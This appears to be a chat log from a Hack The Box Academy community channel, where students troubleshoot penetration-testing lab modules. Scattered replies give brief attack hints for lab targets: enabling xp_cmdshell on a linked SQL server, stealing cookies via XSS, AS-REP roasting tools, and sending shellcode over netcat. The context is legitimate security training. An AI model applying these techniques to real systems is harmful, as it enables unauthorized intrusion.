#

also don't forget to -p- :)

crystal steeple
#

its taking forever though

fathom pendant
#

well if you're adding -sC and -sV to a -p- scan it will take a while

#

like several minutes

crystal steeple
#

im doing it without the sC and sV

fathom pendant
#

you might be able to get away with like -T3 or -T4

#

¯_(ツ)_/¯

crystal steeple
#

does slow connection affect the scan duration too?

fathom pendant
#

it can

crystal steeple
#

thank you marcie

#

i did T4 and got it :3

#

in 1min

#

bruh i think they should switch the diffuclty of the two boxes

#

the easy box was so much harder than the medium one

fathom pendant
#

¯_(ツ)_/¯

shut wraith
#

SESSION SECURITY

Skills Assessment

Anyone free for a DM?

fathom pendant
#

pspssp <@&861185840277487616>

#

they spammed all acad channels

rustic sage
#

Hi, does the student subscription gives access to Senior Web Penetration path?

fathom pendant
#

no

rustic sage
#

oh okay, thank you

fathom pendant
#

the Senior path is tier 3 modules; the student sub only covers up-to and including tier-2

rustic sage
#

I see man, thank you for the info

slender shoal
#

Thanks @fathom pendant

lusty thicket
shut wraith
crystal steeple
#

why can't i enable xp_cmdshell

#

im in the hard lab of Attacking common services

#

did literally eveything , linked to another database where i have admin privilege but can't execute xp_cmdshell and when i try to enable throgh sp_configue i get error

fathom pendant
#

you need to break it up with double quotes

#

things that are seen in the quotes 'sp_configure ' ', 1'

lusty thicket
#

and the admin cookie could be accessed by xss due to lack of httponly protection

crystal steeple
fathom pendant
crystal steeple
fathom pendant
#

especially since your rephrasing the problem in your own words

#

it's a good strategy for learning things too ¯_(ツ)_/¯

#

read about x, knowing also about y
can I also do y with x?
don't see why not

crystal steeple
fathom pendant
#

yep especially if you can ask "Does this make sense"

crystal steeple
#

i can now sleep its 3am in my country lul

dire abyss
#

stuck in "attacking dns" - attacking common services. I added my "<target ip> inlanefreight.htb" to /etc/hosts file. i can ping, nmap, they both give me feedback especially with seeing p53 is open. running nslookingup or dig against inlanefreight.htb gives me zero records

#

also tried subbrute on against inlanefreight.htb and it cant find anything

#

the question specifically ask me to run against inlanefreight.htb however if I use the examples used in the read up like inlanefreight.com.. those do fetch results. is this thing messed up or am i missing something?

fathom pendant
#

You're missing something

#

Since .htb isn't an official tld you still need to specify a query server

#

Inlanefreight.com is a real website that's used in some engagements, which is why it works

#

I.e. with nslookup you'd specify the ip as the lookup

#

nslookup type=ns inlanefreight.htb $target_ip

#

nslookup and similar tools query using public nameservers

#

Subbrute is absolutely the right next step, you just have to provide it the right nameserver to query

#

If nslookup gives you a loopback, then it's safe to assume the nameserver it gives you is the same ip

short hare
#

Stuck on Attacking network Enterprise
I am having a strange problem the nmap binary is not working in ssh as in image
can anyone help...??

fathom pendant
#

Looks like it's empty

short hare
#

no have given the ips in the live_hosts file

#

any other fixes?????

next bronze
#

your nmap binary is empty

#

look at the size

short hare
#

omg

#

yeah got it...

#

how is this possible
when i transferred it showed 100%

#

LOL...

fathom pendant
#

Something happened in the transfer and it didn't go through right

#

¯_(ツ)_/¯

short hare
#

aah....
Need to do the entire process again...

fathom pendant
#

This is why doing some checksum verification is useful when doing file transfers

dire abyss
fathom pendant
#

Correct. (You can also just put the ip in the resolvers.txt for subbrute

dire abyss
fathom pendant
#

;) I can guarantee you're not the first person to ask

astral meteor
#

What defines the functions our objects have?

Does anyone want to help me, to tell what the answer is, I've spent 2 hours and only get errors. Help me

fathom pendant
#

It helps if you specify what module you're working on and what errors you might be getting

rustic sage
#

hello

astral meteor
fathom pendant
#

So the section: command prompt basics

#

?

astral meteor
fathom pendant
#

I'm asking you

#

You're the one actually looking at the module and section you're working on lol

#

I can't help narrow down where you're fucking up if you don't help me know where you're at

#

"First question" doesn't necessarily help

#

If it is that section its Just the folder name, not the filepath

astral meteor
#

I'm not sure how to explain it, but maybe I'll try again

#

Thank you in advance

rich osprey
#

Hi guy’s i need help for the Using Web Proxies Module’s, someone can help me pls

drifting pike
#

Can anyone gift me 550 - 600 academy cubes to complete my desired module? I am very eager to learn from HTB Academy. It will be very helpful for me. Or is there any way to earn this amount of cubes except by referring? Because I've already referred enough of my known persons.

fathom pendant
#

You can just buy them

#

Or if you're a uni student with a uni email, the student discount is pretty good

#

you gotta look more into how the referral works, you only get a tiny portion if someone signs up for a subscription ¯_(ツ)_/¯

#

You're not gonna have a sustainable amount off referrals

drifting pike
# fathom pendant You can just buy them

for now, I don't have the opportunity to buy. I am a jobless person and I don't have any payment option from Bangladesh(my country), international card or anything like that.

fathom pendant
#

Then you're just gonna have to be patient brother, htb occasionally does giveaways if you check in on their socials

autumn pilot
limber river
drifting pike
autumn pilot
#

I believe it caters for all levels from beginner to advanced

faint rampart
#

Can anyone confirm if kerbrute has stopped automatically asreproasting pre auth disabled users?

#

cause im lost rn

next bronze
#

the hashes from kerbrute can't be cracked, has been broken for a while

rich osprey
faint rampart
limber river
next bronze
#

as in don't use kerbrute for anything other than bruting, for kerberoast and asreproast use something else

next bronze
#

they can be cracked if you use nxc or impacket

limber river
#

maybe some updates

next bronze
#

not sure but im not the only one that ran into that

drifting pike
languid fjord
#

Everything from very easy - advanced

autumn pilot
#

don't forget that the best challenge writeup can win a playstation 5

fathom pendant
lusty thicket
limber river
faint rampart
rich osprey
acoustic owl
#

Thanks, the question has been adjusted
Please do not post any spoilers (answers)

lusty thicket
rich osprey
normal sand
#

Module: Windows Fundamentals (Windows Services & Processes)

How do I resolve this issue? I've already tried resetting the pwnbox and target machine.

┌─[eu-academy-1]─[10.10.14.184]─[htb-ac-773541@htb-za5ahfa6ou]─[~]
└──╼ [★]$ xfreerdp /v:10.129.120.207 /u:htb-student /p:Academy_WinFun!
[10:57:36:758] [2499:2500] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:57:36:758] [2499:2500] [ERROR][com.freerdp.core] - failed to connect to 10.129.120.207
cedar yew
#

Hello guys i need help

Module: Shell and Payloads
Section: Anotomy of a shell
Question : " + 0 Which two shell languages did we experiment with in this section? (Format: shellname&shellname) "

I extracted the information with the env command, but I could not find the correct format.

thx for help

limber river
fathom pendant
normal sand
limber river
normal sand
# limber river hahahahahah that's happens all the time

Same module, I'm having trouble with the question

Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.
Do I find this in Task Manager?

next bronze
limber river
#

any1 facing problem with slow labs ?

cedar yew
limber river
next bronze
limber river
#

maybe I need to switch vpn

slim depot
#

why is the vm of priv esc (sudo) so slow

slim depot
minor stag
#

The bash script modules in the Information Security path are driving me crazy. I feel like the material isn't preparing me to write the scripts to answer the questions.

short hare
#

Little help from Attacking Network Enterprise
Anyone ligolo expert here

trying to run commands as per github repo but this strange error !!!!

Can anyone help???

limber river
#

+the problem is not from ligolo , you can't have x.x.8.0/16 just not possible

#

just use the subnet from the module

short hare
#

I put .0 because i want to acces all others from those 172.16.8.X/16

short hare
limber river
limber river
#

use /23

short hare
#

ok

limber river
#

if you have an idea abt subnetting you will know why this is not possible

short hare
#

i used 24 and it worked

Thanks @limber river

short hare
torpid cove
#

why is HTB vpn not connecting even when im not connecting to the server in maintainance, is this only happening to me or it seems all the servers are down??

limber river
short hare
#

hey @limber river just want to ask one thing

My head is not working but need to complete this thing

Now as I can do scan etc etc 172.16.8.50 say

How to visit this 172.16.8.50 in firefox?

It gives connection failed

limber river
#

you can ping it ?

short hare
#

oohhh ohh worked..!!

limber river
#

congrats , still having issue with PE on the initial access , idk why it's not working lol

short hare
#

anyway thanks for the support

limber river
#

I am doing ping sweep now on the same lab

next bronze
#

who's gonna help you in the exam?

split pelican
#

Hello Yall✌

short hare
# next bronze who's gonna help you in the exam?

I know you speak hard, and that's for good

But I am human, bound to make mistakes and learn from them. Sometimes figuring out mistakes becomes difficult unless someone who went through this gives a little nudge.

limber river
austere sapphire
#

So ive noticed with some of these they give me a vpn code thing that you download but im not sure what it is/what i do with it

limber river
#

we all made mistakes , in fact we can't learn without them

next bronze
#

I didn't say you can't make mistakes, I'm saying that you're expected to find out what went wrong yourself. nobody is gonna give you a nudge in the exam. or in an actual pentest

short hare
#

@next bronze @limber river
Got your point

next bronze
#

and there's also the type of question being asked, if it's something complex and not immediately obvious, sure that's fine. but for basics questions, like in this case basic subnetting, the error itself is already a big hint you can work on

limber river
short hare
#

Thanks @next bronze @limber river for the suggestions
Will work on it..!

austere sapphire
#

Even tho i love windows

#

Maybe i could install a vm and double boot

#

Is that even possible?

next bronze
#

for pentesting, most people use linux. you don't need to dual boot if you're running a vm

austere sapphire
#

So a vm will work for this kind of purpose?

#

Just making sure

next bronze
#

yep, that's also what most people do

austere sapphire
#

Alright any tutorial reccomendations for a vm install?

#

Never done it of course

next bronze
#

if you're doing academy, the getting started module walks you through it

austere sapphire
#

Oh I must of not retained it my bad ill go back into it

#

Thanks

tranquil axle
#

if you want to reach 172.16.9.10 then you can't reach that with your /24 notation

analog dove
#

Hey, I am procrastinating to complete my module in HTB? Can anyone please suggest me anything to fix it

raven lagoon
warm tartan
#

Hey everyone I'm having trouble with this question in the IDS/IPS module: There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword]; Can someone point me in the right direction? I was able to make snort trigger alerts on the traffic but so far no luck on the answers to the question. Thanks in advance

potent ermine
potent ermine
warm tartan
#

I found the user-agent specified in the rule. and i tried multiple specific options to trigger the rule. but no luck

potent ermine
potent ermine
mossy nest
#

Hey guyz

#

I'm doing Attacking Common Web Application in htb academy

#

But I have a weard problem about the splunk section

#

└──╼ $ sudo nmap -sV 10.129.223.73
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 16:47 CET
Nmap scan report for 10.129.223.73
Host is up (0.044s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
8000/tcp open ssl/http Splunkd httpd
8080/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
8089/tcp open ssl/http Splunkd httpd

#

I got splunk opened port

#

But neither opening chrome with 10.129.223.73:8000 or 10.129.223.73:8089 work

#

I then tried curl it

#

┌─[✗]─[user@parrot]─[~/Desktop/HTB/Course/AttackingCommonApplication]
└──╼ $curl http://10.129.223.73:8000
curl: (52) Empty reply from server
┌─[✗]─[user@parrot]─[~/Desktop/HTB/Course/AttackingCommonApplication]
└──╼ $curl http://10.129.223.73:8089
curl: (52) Empty reply from server

austere sapphire
#

what linux version would be reccomended for a bug bounty hunter

#

Or does it not entirely matter

#

im not too sure im downloading a vm so

mossy nest
#

Depending are you following htb bounty hunter program ?

shell nexus
#

so i am currently on linux fundamentals at the editing files part, however i seem to not be able to use nano properly, even when full screening the workstation, the key combinations needed for certain actions are either not working properly and don't do anything, or open new browser tabs, does this have to do with the browser i am using? would using chrome for example fix the issue? or cpuld it have to do with my OS? I use linux mint. if anyone has any ideas on what could be causing this please tell me

fathom pendant
#

If you're looking to specify in reversing and stuff like that I believe there's a distro: REMNux

stoic hemlock
#

hi,guys currently i am studying the linux privilege escalation and i have study until the Special Permissions of the module. When i doing the question of the topic and already have the answer based on the hints of the discussion forum, but it lead to one confusion:
what is the question meaning, especially the section command output (Find a file with the setuid bit set that was not shown in the section command output)
how do we determine the binary with the signature instead of the try to input the file path one by one as the forum discuss

Thank you for the time

austere sapphire
native gorge
#

hello guys, currently im doing the introduction to assembly language and i am unable to understand how to get the flag in the question

The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the sever with "nc SERVER_IP PORT" to send the shellcode.

im unsure how to use netcat to run the shellcode.

next bronze
#

connect to the target using nc, paste the shellcode, enter

native gorge
#

only the hex and nothing more?

next bronze
#

yes

native gorge
#

i have tried pasting the hex for /bin/sh but it gave me "failed to run shellcode!"

next bronze
#

that's not what the question asked for

native gorge
#

isnt the shellcode the hex value u generate using the shellcraft?

next bronze
#

yes but why sh? the question asked for

shellcode that prints the content of '/flag.txt

native gorge
#

the hint suggested /bin/cat/flag.txt

so is the shellcraft path=/bin/cat and argv = ['flag.txt']?

#

i tried the above as the path and arg but it didnt work

next bronze
#

whats the path to flag.txt?

native gorge
#

the hint says "/bin/cat/flag.txt"

next bronze
#

I mean shellcraft is not the only tool you can use

native gorge
#

does using a different tool change the shellcode you get?

native gorge
echo sage
#

technical issues with a SOC module here: PKI-ESC1
cannot connect to WS001 from kali error message: trust relationship between this workstzation and the primary domain failed.

any ideas? cannot practice the techniques shown in this module and solve the questions.

ember coral
#

do diffrent versions of kerbrute have diffrent syntax? I've tried all the suggestions and followed -h and still cant get it to run

next bronze
#

did you install the right kerbrute? it doesn't the impacket libraires afaik

mossy nest
#

Hey guyz

#

I tried to connect to gitlab in attacking common application

#

I found username to connect with

#

But cannot get the password

#

And they say in the course that after 10 try the account is lock for 10 minutes

#

So bruteforce doesn't seems to be an options

potent ermine
barren jewel
#

Can someone help me with this?

Module: Advanced Xss and CSRF Exploitation
Section: Bypassing CSRF Tokens via CORS Misconfigurations

I am not able to get a working payload

rustic sage
#

Hi man, have tried that Cypher Query and it's dosen't work

empty atlas
#

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

#

Does anyone have Kira's password?

#

Been slamming my head against a wall looking for it hahah

echo sage
potent ermine
empty atlas
#

I tried this!

#

several times haha

#

I apparently already cracked this password, it is making me use if for another module, so I went back to look and its not an answer for any of the previous questions.

#

If someone could DM me the password that would be great.. Its not for a lab completion.. just to start the lab..

hot heart
#

Can someone tell me how the following question has anything to do with Burp or ZAP? I got the flag by enabling it directly from within the browser but not with burp or ZAP?
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

#

This is in the Web Proxies module, under the Skills Assessment exercise

quiet ember
#

Because you can do it with Burp or ZAP

hot heart
#

I tried, I cannot manipulate the HMTL code within either application

quiet ember
#

you can intercept the response in burp and enable the button

hot heart
#

I tried that. It shows me the disabled button, but all I can do is look at it

#

It won't let me change anything

quiet ember
#

you can modify the HTML in the resonse to enable the button

hot heart
#

So you're telling me all I have to do is manipulate the code within the response tab to enable the button? Because I am physically trying as we speak and it will not take any of my input

#

All I can do is look at the response tab

urban wadi
#

lets go, almost done with the no-treshold challenge but i need to learn brute forcing and ip chaning, anyone able to suggest me module about ip changing and stuff that can evade too many attempts?

hot heart
quiet ember
hot heart
#

By manipulating the HTML code with inspect

quiet ember
#

you can manipulate the HTML code within burp by intercepting server response

hot heart
#

I've tried that

#

I'm telling you it won't take my input idk why

quiet ember
#

weird, dm me

next bronze
empty atlas
#

Yeah I guess so

inland mesa
#

has anyone been able to reach htb support? sent two emails no reply and nothing from the live chat either

dreamy solar
#

Hello

#

who did this and can tell me which service I should authenticate with the credentials I have? Because I tried them all

hot heart
acoustic owl
acoustic owl
#

Please do not post any spoilers
Read the module again. It explains how you can write a file with SQL

acoustic owl
dire abyss
#

going through the sql module under attacking common services but it doesnt go over webshells. I guess im just more curious how people figured what shell to generate using rev shell site

acoustic owl
dire abyss
#

is there a specific passage i can reference in HTB academy? I really want to understand this.

queen drum
#

If I do a module that costs 500 and I only get 100 back. What happens when i run out of cubes?

analog dock
errant swift
#

does anyone else have vpn problems with the eu-2 vpn?👀

#

ah well... >_< 😄

dire abyss
#

earlier i had some issues with US-3

#

maybe a hiccup